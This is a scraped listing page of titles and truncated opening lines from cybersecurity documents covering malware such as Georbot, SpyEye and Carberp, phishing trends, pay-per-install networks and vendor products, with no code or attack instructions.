From Georgia, with Love Win32/Georbot Is someone trying to spy on Georgians? At the beginning of the year, a curious piece of malware came to our attention. An analyst in our virus laboratory noticed that
More informationVersafe TotALL Online Fraud Protection
Versafe TotALL Online Fraud Protection Protect ALL users. From ALL malware, threat types. On ALL devices. ALL transparently to the end-user. Summary of Mobile Malware & Cross-Device Attacks Overview of
More informationApril 11, 2011. (Revision 2)
Passive Vulnerability Scanning Overview April 11, 2011 (Revision 2) Copyright 2011. Tenable Network Security, Inc. All rights reserved. Tenable Network Security and Nessus are registered trademarks of
More informationMalware, Phishing, and Cybercrime Dangerous Threats Facing the SMB State of Cybercrime
How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Malware, Phishing, and Cybercrime Dangerous Threats Facing the SMB State of Cybercrime sponsored by Introduction
More informationUnknown threats in Sweden. Study publication August 27, 2014
Unknown threats in Sweden Study publication August 27, 2014 Executive summary To many international organisations today, cyber attacks are no longer a matter of if but when. Recent cyber breaches at large
More informationState of the Web 2015: Vulnerability Report. March 2015. 2015 Menlo Security Alright Reserved
State of the Web 2015: Vulnerability Report March 2015 Motivation In February 2015, security researchers http://www.isightpartners.com/2015/02/codoso/ reported that Forbes.com had been hacked. The duration
More informationTrend Micro Incorporated Research Paper 2012. Adding Android and Mac OS X Malware to the APT Toolbox
Trend Micro Incorporated Research Paper 2012 Adding Android and Mac OS X Malware to the APT Toolbox Contents Abstract... 1 Introduction... 1 Technical Analysis... 2 Remote Access Trojan Functionality...
More informationLASTLINE WHITEPAPER. Large-Scale Detection of Malicious Web Pages
LASTLINE WHITEPAPER Large-Scale Detection of Malicious Web Pages Abstract Malicious web pages that host drive-by-download exploits have become a popular means for compromising hosts on the Internet and,
More informationSpy Eye and Carberp the new banker trojans offensive
Spy Eye and Carberp the new banker trojans offensive The common way for a wanna-be hacker to fulfill his sick aspirations is to achieve a known trojan there is a plenty on the Internet, sometimes they
More informationDefend Your Network with DNS Defeat Malware and Botnet Infections with a DNS Firewall
Defeat Malware and Botnet Infections with a DNS Firewall By 2020, 30% of Global 2000 companies will have been directly compromised by an independent group of cyberactivists or cybercriminals. How to Select
More informationPhishing Activity Trends Report. 1 st Half 2009. Committed to Wiping Out Internet Scams and Fraud
1 st Half 2009 Committed to Wiping Out Internet Scams and Fraud January June 2009 Phishing Report Scope The quarterly APWG analyzes phishing attacks reported to the APWG by its member companies, its Global
More informationLanFiltrator The "Reversed" Trojan. (Free Gobo 2) Security Through Hacking. Straight forward, no nonsense Security tool Tutorials.
SECUREIT.CO.IL Tutorial LanFiltrator Trojan Security Through Hacking LanFiltrator The "Reversed" Trojan (Free Gobo 2) Straight forward, no nonsense Security tool Tutorials SECUREIT.CO.IL SECURITY THROUGH
More informationThe Underground Economy of the Pay-Per-Install (PPI) Business
The Underground Economy of the Pay-Per-Install (PPI) Business Kevin Stevens, Security Researcher SecureWorks Counter Threat Unit (CTU) History of the PPI Business The Pay-Per-Install business model (PPI)
More informationHow To Protect Yourself From A Web Attack
Five Stages of a Web Malware Attack A guide to web attacks plus technology, tools and tactics for effective protection By Chris McCormack, Senior Product Marketing Manager Today s web attacks are extremely
More informationDr. Seltsam, oder wie ich lernte, Malware zu lieben
Dr. Seltsam, oder wie ich lernte, Malware zu lieben Matthias Schmidt schmidt@ieee.org Quid est Malware? 2 Viruses Spyware Worms Adware Malware Rootkits Trojans Keyloggers Ransomware Dialers 06/05/13 3
More informationCurrent counter-measures and responses by CERTs
Current counter-measures and responses by CERTs Jeong, Hyun Cheol hcjung@kisa.or.kr April. 2007 Contents I. Malware Trends in Korea II. Malware from compromised Web sites III. Case Study : Malware countermeasure
More informationFSOEP Web Banking & Fraud: Corporate Treasury Attacks
FSOEP Web Banking & Fraud: Corporate Treasury Attacks Your Presenters Who Are We? Tim Wainwright Managing Director Chris Salerno Senior Consultant Led 200+ penetration tests Mobile security specialist
More informationThreat Intelligence UPDATE: Cymru EIS Report. www.team- cymru.com
Threat Intelligence Group UPDATE UPDATE: SOHO Pharming A Team Cymru EIS Report Powered Page by T1eam Threat Intelligence Group of 5 C ymru s This is an update on the SOHO Pharming case we published a little
More informationIntroduction: 1. Daily 360 Website Scanning for Malware
Introduction: SiteLock scans your website to find and fix any existing malware and vulnerabilities followed by using the protective TrueShield firewall to keep the harmful traffic away for good. Moreover
More informationThe current case DNSChanger what computer users can do now
The current case DNSChanger what computer users can do now Content What happened so far? 2 What is going to happen on 8 March 2012? 2 How can I test my Internet settings? 2 On the PC 3 On the router 5
More informationPay-Per-Install The New Malware Distribution Network
Pay-Per-Install The New Malware Distribution Network Nishant Doshi, Ashwin Athalye, and Eric Chien Contents Introduction... 1 Pay-Per-Install Distribution Model... 2 Recruiting Affiliates... 4 The Payload...
More informationCurrent Threat Scenario and Recent Attack Trends
Current Threat Scenario and Recent Attack Trends Anil Sagar Additional Director Indian Computer Emergency Response Team (CERT-In) Objectives Current Cyber space Nature of cyberspace and associated risks
More informationTHE OPEN UNIVERSITY OF TANZANIA
THE OPEN UNIVERSITY OF TANZANIA Institute of Educational and Management Technologies COURSE OUTLINES FOR DIPLOMA IN COMPUTER SCIENCE 2 nd YEAR (NTA LEVEL 6) SEMESTER I 06101: Advanced Website Design Gather
More informationWeb Vulnerability Scanner by Using HTTP Method
Available Online at www.ijcsmc.com International Journal of Computer Science and Mobile Computing A Monthly Journal of Computer Science and Information Technology IJCSMC, Vol. 4, Issue. 9, September 2015,
More informationFighting Advanced Threats
Fighting Advanced Threats With FortiOS 5 Introduction In recent years, cybercriminals have repeatedly demonstrated the ability to circumvent network security and cause significant damages to enterprises.
More information